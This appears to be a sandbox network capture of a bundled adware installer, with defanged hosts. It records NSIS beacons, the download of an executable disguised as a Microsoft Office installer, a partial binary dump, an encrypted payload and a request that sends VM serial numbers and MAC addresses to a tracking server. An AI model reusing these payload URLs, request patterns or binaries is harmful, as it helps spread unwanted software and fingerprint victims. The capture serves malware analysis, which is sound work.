Content-Type: application/x-www-form-urlencoded

Content-Length: 212

cid=5c12d1104cca24294ae7d8d45ce8d028&uac=1&id[]=1118540&id[]=1118541&id[]=453683&id[]=453684&id[]=453685&id[]=453686&id[]=686787&id[]=686788&id[]=686789&id[]=686790&id[]=856042&id[]=856043&id[]=856338&id[]=856339
HTTP/1.1 403 Forbidden

Server: CloudFront

Date: Tue, 10 Apr 2018 06:22:41 GMT

Content-Type: text/html

Content-Length: 694

Connection: close

X-Cache: Error from cloudfront

Via: 1.1 43b9f4d448ebe6351f89a9711a64ab54.cloudfront.net (CloudFront)

X-Amz-Cf-Id: igD48ZnOniak9ymieuzNsq71DYLDe17u_PGTQVcfR2anXuUnM227oA==
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "htt
p://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD><MET
A HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
;.<TITLE>ERROR: The request could not be satisfied</TITLE>
.</HEAD><BODY>.<H1>403 ERROR</H1>.<H2>Th
e request could not be satisfied.</H2>.<HR noshade size="1px"
>.This distribution is not configured to allow the HTTP request met
hod that was used for this request. The distribution supports only cac
hable requests...<BR clear="all">.<HR noshade size="1px">.
<PRE>.Generated by cloudfront (CloudFront).Request ID: igD48ZnOn
iak9ymieuzNsq71DYLDe17u_PGTQVcfR2anXuUnM227oA==.</PRE>.<ADDRE
SS>.</ADDRESS>.</BODY></HTML>..

GET /stats.php?bu=&c=&step=3 HTTP/1.0

Host: gold.powerstring.bid

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*


HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Content-Length: 0

Connection: close

Date: Tue, 10 Apr 2018 06:22:46 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

X-Cache: Miss from cloudfront

Via: 1.1 43c3e9179a39d087f25c9ddba8a3d184.cloudfront.net (CloudFront)

X-Amz-Cf-Id: vdPAtRf6Lk3xBydG1qcx4NVTCXor2OHaAnFaEZ_1jrgqJmogQ1qDCg==

GET /stub_maker.php?program=sevenzip&tid=18778101&pid=539&b_typ=pe&reb=1&name=MICROSOFT Office PRO Plus 2016 v16.0.4229.1020 Final Nov.Update HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: ake.needmonth.bid

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Content-Type: application/force-download

Content-Length: 47843

Connection: keep-alive

Server: Microsoft-IIS/7.5

X-Powered-By: PHP/5.3.28

Content-Disposition: attachment; filename="5acc58219a70e.exe"

X-Powered-By: ASP.NET

Date: Tue, 10 Apr 2018 06:22:26 GMT

X-Cache: Miss from cloudfront

Via: 1.1 556e1e002dcf7a95ee196fc550f9ea94.cloudfront.net (CloudFront)

X-Amz-Cf-Id: DbyLXBGAa8yHgZtTS9FuBwb4qBg_YwhsjZk7Sbyh5D0Yse2rl1ynJg==

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................Z...........0.......p....@.........
.................P...............................................s....
...@..................................................................
.............p...............................text....X.......Z........
.......... ..`.rdata.......p.......^..............@..@.data...x.......
.....p..............@....ndata.......@...........................rsrc.
.......@.......t..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
..>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u
...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..
M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...
Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@.
.vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r
@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.
......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[...U.

<<< skipped >>>

GET /stats.php?bu=&c=&step=4 HTTP/1.0

Host: gold.powerstring.bid

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*


HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Content-Length: 0

Connection: close

Date: Tue, 10 Apr 2018 06:22:47 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

X-Cache: Miss from cloudfront

Via: 1.1 4001cc23eb32ec3ac8fe5303310fc493.cloudfront.net (CloudFront)

X-Amz-Cf-Id: HN4VJWQolcKAzqbgL7lvv4kzfwfWPDXA8qEoiyIFPDYSaGSswqWlOQ==

GET /ads?key=3a71f57f6d976f956c5f61dbdd4adf7b&ch=&cp.chan=&cp.vtl=&cp.crr=&cp.exld= HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Referer: hXXp://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: VVV.1-1ads.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Access-Control-Allow-Origin: *

Cache-Control: no-cache

Pragma: no-cache

Expires: Thu, 01 Jan 1970 00:00:00 GMT

P3P: CP="CAO PSA OUR"

Set-Cookie: UUID=9524ab60-3c87-11e8-9a86-3c4a92ef4778; Domain=.VVV.1-1ads.com; Expires=Thu, 09-Apr-2020 06:22:45 GMT; Path=/

Content-Type: text/html;charset=UTF-8

Content-Length: 1307

Date: Tue, 10 Apr 2018 06:22:45 GMT
<!DOCTYPE html><html><head><!--120492:5103-->&
lt;/head><body leftmargin='0' topmargin='0' marginwidth='0' marg
inheight='0' style='background-color:transparent; width: 100%; text-al
ign: center;'><script type="text/javascript">new Image().src 
= "hXXp://VVV.1-1ads.com/impression.gif?b=120492&p=5103&c=10390&h=177a
937b0d9a7a39eee4f1dd260ad305&l=UA&sh=800&sw=1280&ad.trans.id=xtjmf1cl4
aok&cps=Y2hhbg*~dnRs*~Y3Jy*~ZXhsZA*&s=03e8cba91683911ccd51608978f73922
&t=1523341365531";</script><a href="hXXps://VVV.facebook.com/
campaign/landing.php?campaign_id=450270011836003&extra_1=10390&placeme
nt=5103&creative=120492&keyword=&partner_id=ironsource&extra_2=UA" onm
ousedown="(function(a){a&&a.href&&(a.onmousedown='',a.href='hXXp://www
.1-1ads.com/cr?b=120492&p=5103&c=10390&h=177a937b0d9a7a39eee4f1dd260ad
305&l=UA&sh=800.0&sw=1280.0&ad.trans.id=xtjmf1cl4aok&cps=Y2hhbg*~dnRs*
~Y3Jy*~ZXhsZA*&UUID=9524ab60-3c87-11e8-9a86-3c4a92ef4778&t=15233413655
31&u=https://VVV.facebook.com/campaign/landing.php?campaig
n_id=450270011836003&extra_1=10390&placement=5103&creative
=120492&keyword=&partner_id=ironsource&extra_2=UA')})(th
is);return!1;"  target="_blank"><img border="0" alt="" src="http
://irncdn.com/files135/65/10390/120492/FB_RU_800_Icons2.jpg" width="80
0" height="440"></a></body></html>..<<< skipped >>>

GET /pr/public/css/style.css HTTP/1.1

Accept: text/css

Referer: hXXp://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ic-dc.bundlessafevault.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: text/css

Content-Length: 1472

Connection: keep-alive

Date: Thu, 29 Jun 2017 11:20:46 GMT

Last-Modified: Thu, 21 Jul 2016 07:28:41 GMT

ETag: "d87938f58e3b40da8272e3eb0c1b47d3"

Accept-Ranges: bytes

Server: AmazonS3

Age: 82740

X-Cache: Hit from cloudfront

Via: 1.1 e6b91293dd7890a2ad1d12ed6444c502.cloudfront.net (CloudFront)

X-Amz-Cf-Id: zmx-BtyZPd4qKBgvnUSFF_l4fD9wDv4pxsqh_WCUmltJAXvIkvtHGw==
body {.  padding: 0;.  margin: 0;.  background-color: white;.  font-fa
mily: arial, sans-serif;.  color: #0b0b0b; }...wrapper {.  position: a
bsolute;.  top: 0;.  bottom: 0;.  left: 0;.  right: 0; }.  .wrapper .h
eader {.    height: 294px;.    margin: 0 auto;.    background-color: #
0b0b0b; }.    .wrapper .header .title {.      color: white;.      text
-align: center; }.      .wrapper .header .title .title-caption, .wrapp
er .header .title .title-caption-inter {.        text-align: center;. 
       font-style: italic;.        font-weight: 600;.        font-size
: 38px;.        line-height: 103px; }.      .wrapper .header .title .t
itle-caption-inter {.        line-height: 40px;.        padding-top: 3
0px; }.      .wrapper .header .title .title-description {.        font
-size: 20px;.        padding-top: 10px;.        width: 615px;.        
margin: 0 auto;.        font-style: italic; }.  .wrapper .content {.  
  text-align: center;.    margin: 0 auto;.    height: 654px;.    backg
round-color: white; }.    .wrapper .content .inner, .wrapper .content 
.inner-typ {.      top: -191px;.      margin: 0 auto;.      position: 
relative;.      width: 800px;.      height: 440px;.      border: 20px 
solid #bfccd2;.      background-color: white; }.    .wrapper .content 
.inner-typ {.      top: -140px; }.    .wrapper .content .adnl_zone {. 
     position: absolute;.      background-color: #bfccd2;.      margin
: auto;.      top: 0;.      right: 0;.      left: 0;.      bottom: 0; 
}...<<< skipped >>>

POST hXXp://kiss.oatmealscene.loan/installer.php?affId=1006&instId=11&ho_trackingid=HO3360345515acc5833a96a6&trackingId=336034551&cc=UA&untracked=&uac=1&osd=1601&net=4.5.50709&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 HTTP/1.1

Host: kiss.oatmealscene.loan

Connection: close

Accept: */*

User-Agent: InstallCapital

Content-Type: application/x-www-form-urlencoded

Content-Length: 212

cid=5c12d1104cca24294ae7d8d45ce8d028&uac=1&id[]=1118540&id[]=1118541&id[]=453683&id[]=453684&id[]=453685&id[]=453686&id[]=686787&id[]=686788&id[]=686789&id[]=686790&id[]=856042&id[]=856043&id[]=856338&id[]=856339
HTTP/1.1 200 OK

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Type: text/html; charset=utf-8

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Set-Cookie: PHPSESSID=1q59jtmvnkqoaufrreb3gmb6s5; path=/

Set-Cookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMVwiOjE1MjMzNDEzNjF9LFwidGltZVwiOjE1MjMzNDEzNjF9In0.L7TibYFb2iXT8_maK2fQtsi7dovoKKFZMlsECMOviwg; expires=Fri, 11-May-2018 06:22:44 GMT; path=/; domain=.kiss.oatmealscene.loan

Date: Tue, 10 Apr 2018 06:22:44 GMT

Connection: close

Content-Length: 43992
.b"..f.u..........>.Oi@.nQ..m..R.=.gk.A..6......."..\.5O.dp4.wZ....
.......N.=(.....9......J..|..ke'A..J...{..p....k$...3%....."...g.a....
....9E.s...$._k..7..O.9..q[.f..f..'RG(U.....#.zR.v-....n[.}.m.;.t((n=3
......Z.:Jz........&.^....?l..]...C..W.)IYh.Se n.YAFT..I..........@..u
.v...34.9..._..hI.*s.O?......j....(..U...6...dJ.wwg.....{\....z....A,.
\.K|.J2 Q)jW..l.)..;.@....H........>..sd.Yoxr... ~...<..TO.Z.Y..
..... ....Z...........p..ph".|. .../."..l)L......=G.kh..i!...HX...@.$.
.T..|....h.....Q['.m&. ....'A.o.0..5m..;N._P(.h...l...C).`........,s.S
...4<.4...dT..m...~.y.}..B..4.I......,..........@.#.J...'.T.{..7N.w
.}....O/..{.h.D....yA........ &........|...C...@Y..........fX....7..`.
PEj.EH~#c.c0.t=NY.Z.....`.ZCp.#.......}....).q.Q.-.v1.|g...\..{.X....=
........%..x.8VD..[VQ*.........&..X....w...a..ax.Fw.d.;..'....:Ri..{pU
..........]..N..=B....@i..J....P_.RO...F.3....h..e..E.Z..}.@6O.R8.h...
.......k:......\......6..6/...D...tG.=.'{..\...T.._.(..&..p .Q.Vz.....
.;.....F.oF.............V"'.4.&G..:!.k..|...0BL."=..w...\..%...H.3..n.
.Y.....9...^.1....8-....Hso;..x...z.....=.k..io....P...d..6Xx.......u.
..C6..8.8..K.gs.WW......_.z<.:....x}...2....@._N.~E.....>.N=h.Mh
..sS ..?4/D.BT.M....u.d2..L .".$$|.....0......48e....[f`C..Q.~J.. .Us.
.`....o..Y.<.<.?...]..|..ol...\.."W).4P S..X....!.).%M,.........
.&.3w>.._6.C.;>..;.......R9..6.k......D.nW20.&..,M#......(.Z:.&g
t;.._W..g8.. .."....]..S.QF.-.........3<.8f.G.D.:..N.Q.s.$........I
v....U#)...P..eq..&.o.....X!....k..)JB.L......#.A.xy.J{.........n.<<< skipped >>>

GET /stats.php?bu=cp&c=&step= HTTP/1.0

Host: gold.powerstring.bid

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*


HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Content-Length: 0

Connection: close

Date: Tue, 10 Apr 2018 06:22:44 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

X-Cache: Miss from cloudfront

Via: 1.1 de756dc86b5525fda1e402d7ed00c815.cloudfront.net (CloudFront)

X-Amz-Cf-Id: H8qFctmN9HXEelLsz4aQASLcQgS3pjVoOvobY33j9SNrZdmQ3iLibQ==

GET /favicon.ico HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Host: ic-dc.bundlessafevault.com

Connection: Keep-Alive


HTTP/1.1 403 Forbidden

Content-Type: application/xml

Transfer-Encoding: chunked

Connection: keep-alive

Date: Tue, 10 Apr 2018 06:21:51 GMT

Server: AmazonS3

Age: 54

X-Cache: Error from cloudfront

Via: 1.1 556e1e002dcf7a95ee196fc550f9ea94.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 4ReO9sAkip6DkGFFDypOclfT2-kSIskHsLfne-f1bunLWkdVfNOXwQ==
f3..<?xml version="1.0" encoding="UTF-8"?>.<Error><Code
>AccessDenied</Code><Message>Access Denied</Message&
gt;<RequestId>5D783F578D1E95C4</RequestId><HostId>MA
1405O5N8PLlmaCgC8285EY8YRPQSKEkn6sFoxtsi44fXn2IxFsTXmzI0uUjx5a6OAzaE/x
e1A=</HostId></Error>..0..

GET /pr/public/js/jquery.min.js HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ic-dc.bundlessafevault.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: application/javascript

Content-Length: 86351

Connection: keep-alive

Date: Mon, 20 Nov 2017 05:09:05 GMT

Last-Modified: Sun, 07 Aug 2016 11:30:34 GMT

ETag: "05e51b1db558320f1939f9789ccf5c8f"

Accept-Ranges: bytes

Server: AmazonS3

Age: 3559

X-Cache: Hit from cloudfront

Via: 1.1 3fd65a3304273a3a309254dd830aec6c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: Qj5m-Xave1x56W8GZoARgR00DE82k9B4PBcZUn9xjszALgDlVyQBAw==
/*! jQuery v3.1.0 | (c) jQuery Foundation | jquery.org/license */.!fun
ction(a,b){"use strict";"object"==typeof module&&"object"==typeof modu
le.exports?module.exports=a.document?b(a,!0):function(a){if(!a.documen
t)throw new Error("jQuery requires a window with a document");return b
(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use s
trict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.con
cat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toSt
ring,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElemen
t("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}v
ar q="3.1.0",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\
xA0] |[\s\uFEFF\xA0] $/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){retur
n b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,t
oArray:function(){return f.call(this)},get:function(a){return null!=a?
a<0?this[a this.length]:this[a]:f.call(this)},pushStack:function(a)
{var b=r.merge(this.constructor(),a);return b.prevObject=this,b},each:
function(a){return r.each(this,a)},map:function(a){return this.pushSta
ck(r.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){
return this.pushStack(f.apply(this,arguments))},first:function(){retur
n this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b
=this.length,c= a (a<0?b:0);return this.pushStack(c>=0&&c<b?[
this[c]]:[])},end:function(){return this.prevObject||this.constructor(
)},push:h,sort:c.sort,splice:c.splice},r.extend=r.fn.extend=functi<<< skipped >>>

GET /files135/65/10390/120492/FB_RU_800_Icons2.jpg HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://VVV.1-1ads.com/ads?key=3a71f57f6d976f956c5f61dbdd4adf7b&ch=&cp.chan=&cp.vtl=&cp.crr=&cp.exld=

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: irncdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Tue, 10 Apr 2018 06:22:45 GMT

Content-Type: image/jpeg

Content-Length: 97369

Connection: keep-alive

Access-Control-Allow-Origin: *

Last-Modified: Tue, 28 Feb 2017 14:24:48 GMT

Server: CDN77-Turbo

X-Edge-IP: 185.180.12.10

X-Edge-Location: viennaAT

X-Cache: HIT

X-Age: 292334
......Exif..II*.................Ducky.......P...../hXXp://ns.adobe.com
/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> 
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c11
1 79.158325, 2015/09/10-01:10:20        "> <rdf:RDF xmlns:rdf="h
ttp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rd
f:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http:
//ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/s
Type/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"
 xmpMM:InstanceID="xmp.iid:F65B7BCC06FC11E69887BD153D44D083" xmpMM:Doc
umentID="xmp.did:F65B7BCD06FC11E69887BD153D44D083"> <xmpMM:Deriv
edFrom stRef:instanceID="xmp.iid:F65B7BCA06FC11E69887BD153D44D083" stR
ef:documentID="xmp.did:F65B7BCB06FC11E69887BD153D44D083"/> </rdf
:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end=
"r"?>....Adobe.d...................................................
......................................................................
.......................... ...........................................
....................................................!1..A.Qa".q.2.S...
BR.#..V....b3.$...7Wr..u...Cs4Tt%6v...5Ue..F...c.&G8.Dd...............
.........!1AQ..q...a."2R.....3S...Br#4.b$......CT5.s..D%ct............
.?......L..k.TG.........B...../..Q.....L..iD*;..2.q..........B...../..
Q.....L..iD*;..2.q..........B...../..Q.....L..iD*;..2.q..........B....
./..Q.....L..iD*;..2.q..........B...../..Q.....L..iD*;..2.q.......<<< skipped >>>

GET /impression.gif?b=120492&p=5103&c=10390&h=177a937b0d9a7a39eee4f1dd260ad305&l=UA&sh=800&sw=1280&ad.trans.id=xtjmf1cl4aok&cps=Y2hhbg*~dnRs*~Y3Jy*~ZXhsZA*&s=03e8cba91683911ccd51608978f73922&t=1523341365531 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://VVV.1-1ads.com/ads?key=3a71f57f6d976f956c5f61dbdd4adf7b&ch=&cp.chan=&cp.vtl=&cp.crr=&cp.exld=

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: VVV.1-1ads.com

Connection: Keep-Alive

Cookie: UUID=9524ab60-3c87-11e8-9a86-3c4a92ef4778


HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Cache-Control: no-cache

Pragma: no-cache

Expires: Thu, 01 Jan 1970 00:00:00 GMT

P3P: CP="CAO PSA OUR"

Set-Cookie: ucv=10390-UA-1523427765646-24--; Domain=.VVV.1-1ads.com; Expires=Wed, 10-Apr-2019 06:22:45 GMT; Path=/

Accept-Ranges: bytes

Content-Type: image/gif

Content-Length: 43

Date: Tue, 10 Apr 2018 06:22:44 GMT

GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Server: Ap
ache-Coyote/1.1..Cache-Control: no-cache..Pragma: no-cache..Expires: T
hu, 01 Jan 1970 00:00:00 GMT..P3P: CP="CAO PSA OUR"..Set-Cookie: ucv=1
0390-UA-1523427765646-24--; Domain=.VVV.1-1ads.com; Expires=Wed, 10-Ap
r-2019 06:22:45 GMT; Path=/..Accept-Ranges: bytes..Content-Type: image
/gif..Content-Length: 43..Date: Tue, 10 Apr 2018 06:22:44 GMT..GIF89a.
............!.......,...........D..;..

GET /report.php?typ=conversion&transId=336034551&affId=1006&instId=11&ho_transId=HO3360345515acc5833a96a6&s1=539&s2=18778101&s3=&s4=LP_DEF&s5=1326407960&cid=5c12d1104cca24294ae7d8d45ce8d028&uac=true&randid=0.6357091785874339 HTTP/1.1

Cache-Control: no-cache

Connection: Keep-Alive

Pragma: no-cache

User-Agent: InstallCapital

Host: kiss.oatmealscene.loan


HTTP/1.1 200 OK

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Type: text/html; charset=utf-8

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Set-Cookie: PHPSESSID=6lp7df2bqo98bbii6c3doqer35; path=/

Set-Cookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMVwiOjE1MjMzNDEzNjN9LFwidGltZVwiOjE1MjMzNDEzNjN9In0.NcuBqk74QFlc1AADR78uMKoGC7sniqdj7Z_9MC7m-fY; expires=Fri, 11-May-2018 06:22:46 GMT; path=/; domain=.kiss.oatmealscene.loan

Date: Tue, 10 Apr 2018 06:22:45 GMT

Content-Length: 0

HTTP/1.1 200 OK..Cache-Control: no-store, no-cache, must-revalidate, p
ost-check=0, pre-check=0..Pragma: no-cache..Content-Type: text/html; c
harset=utf-8..Expires: Thu, 19 Nov 1981 08:52:00 GMT..Server: Microsof
t-IIS/8.5..X-Powered-By: PHP/5.3.28..Set-Cookie: PHPSESSID=6lp7df2bqo9
8bbii6c3doqer35; path=/..Set-Cookie: a862a6096792e35ad3375e3a94312fe4b
a1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ
25zXCI6e1wiMVwiOjE1MjMzNDEzNjN9LFwidGltZVwiOjE1MjMzNDEzNjN9In0.NcuBqk7
4QFlc1AADR78uMKoGC7sniqdj7Z_9MC7m-fY; expires=Fri, 11-May-2018 06:22:4
6 GMT; path=/; domain=.kiss.oatmealscene.loan..Date: Tue, 10 Apr 2018 
06:22:45 GMT..Content-Length: 0..

GET /pr/public/js/adframe.js HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ic-dc.s3.amazonaws.com

Connection: Keep-Alive


HTTP/1.1 200 OK

x-amz-id-2: XODLjIS5cJhIykotlmwkyWFe4/rxg2ebSWRbBfXKV9RmJdEdG73Aws2ImR1jPEViL09 eYVhIqM=

x-amz-request-id: 88F2718C43083057

Date: Tue, 10 Apr 2018 06:22:46 GMT

Last-Modified: Mon, 09 Jan 2017 12:15:17 GMT

ETag: "0d5ff84418e11098019c392f6c85729e"

Accept-Ranges: bytes

Content-Type: application/javascript

Content-Length: 23

Server: AmazonS3

window.adsAreOk = true.HTTP/1.1 200 OK..x-amz-id-2: XODLjIS5cJhIykotlm
wkyWFe4/rxg2ebSWRbBfXKV9RmJdEdG73Aws2ImR1jPEViL09 eYVhIqM=..x-amz-requ
est-id: 88F2718C43083057..Date: Tue, 10 Apr 2018 06:22:46 GMT..Last-Mo
dified: Mon, 09 Jan 2017 12:15:17 GMT..ETag: "0d5ff84418e11098019c392f
6c85729e"..Accept-Ranges: bytes..Content-Type: application/javascript.
.Content-Length: 23..Server: AmazonS3..window.adsAreOk = true...

GET /pr/public/js/detector.js HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ic-dc.bundlessafevault.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: application/x-javascript

Content-Length: 2194

Connection: keep-alive

Date: Mon, 26 Mar 2018 06:45:31 GMT

Last-Modified: Mon, 26 Mar 2018 06:44:30 GMT

ETag: "4e3b3271a30d8939350ace1584358785"

x-amz-meta-cb-modifiedtime: Tue, 06 Mar 2018 13:48:43 GMT

Accept-Ranges: bytes

Server: AmazonS3

Age: 84999

X-Cache: Hit from cloudfront

Via: 1.1 efa4b16c2431de1cbf500664e6fcd4bc.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 1fP9ekapmcjP5DO3J5w_sfTX--lPdmOxQZY-MrAMR-qoJnPJnVFsBw==
$(document).ready(function() {...if (!window.adsAreOk || !window.adsAr
eOk2) {...console.log("no ads for us");....var link = window.link || "
hXXps://freecoolapps.com/v2/?ac=ds";....$(".content").    ..find("[cla
ss^=inner]").    ..css({.      ..display: "block".    .}).    ..append
(.      ..'<div class="blocked_box">'  .        .'<a href="' 
 .        .link  .        .'"><img src="../public/img/recommende
d_chromium.jpg"></a> '  .        ."</div>".    .);..../
/ Stylizing the newly created box...var box = $(".blocked_box");...  .
box.css({..    .position: "absolute",..    .top: "0",..    .left: "0",
..    .width: "100%",..    .height: "100%"..  .});...  .box.find("a im
g").css({..    .maxHeight: "100%"..  .});..} else {..    var QueryStri
ng = (function() {..    .var query_string = {};..    .var query = wind
ow.location.search.substring(1);..    .var vars = query.split("&");.. 
   .for (var i = 0; i < vars.length; i  ) {..      ..var pair = var
s[i].split("=");...      ..if (typeof query_string[pair[0]] === "undef
ined") {..        ..query_string[pair[0]] = decodeURIComponent(pair[1]
);..      ..} else if (typeof query_string[pair[0]] === "string") {.. 
       ..var arr = [query_string[pair[0]], decodeURIComponent(pair[1])
];..        ..query_string[pair[0]] = arr;..      ..} else {..        
..query_string[pair[0]].push(decodeURIComponent(pair[1]));..      ..}.
.    .}..    .return query_string;..  .})();...    var isExlgG = funct
ion (str) {....var g = 10-(str[0]/str[2])==str[1];....return g;.. <<< skipped >>>

GET /report.php?typ=sys&affId=1006&instId=11&ho_transId=HO3360345515acc5833a96a6&transId=336034551&chk_s_b=VMware-56 4d a7 48 b6 81 1f 90-3f 36 cc ce af 92 9a d2&chk_s_v=HPQOEM - 6040000&chk_c_ma=VMware, Inc.&chk_c_mo=VMware Virtual Platform&chk_mac=00:50:56:3C:AC:7120:41:53:59:4E:FF&randid=0.0000717088943324451 HTTP/1.1

Cache-Control: no-cache

Connection: Keep-Alive

Pragma: no-cache

User-Agent: InstallCapital

Host: kiss.oatmealscene.loan


HTTP/1.1 200 OK

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Type: text/html; charset=utf-8

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Set-Cookie: PHPSESSID=v0bn1urf6tqst2lj3ogatho5h6; path=/

Set-Cookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMVwiOjE1MjMzNDEzNjN9LFwidGltZVwiOjE1MjMzNDEzNjN9In0.NcuBqk74QFlc1AADR78uMKoGC7sniqdj7Z_9MC7m-fY; expires=Fri, 11-May-2018 06:22:46 GMT; path=/; domain=.kiss.oatmealscene.loan

Date: Tue, 10 Apr 2018 06:22:45 GMT

Content-Length: 0

HTTP/1.1 200 OK..Cache-Control: no-store, no-cache, must-revalidate, p
ost-check=0, pre-check=0..Pragma: no-cache..Content-Type: text/html; c
harset=utf-8..Expires: Thu, 19 Nov 1981 08:52:00 GMT..Server: Microsof
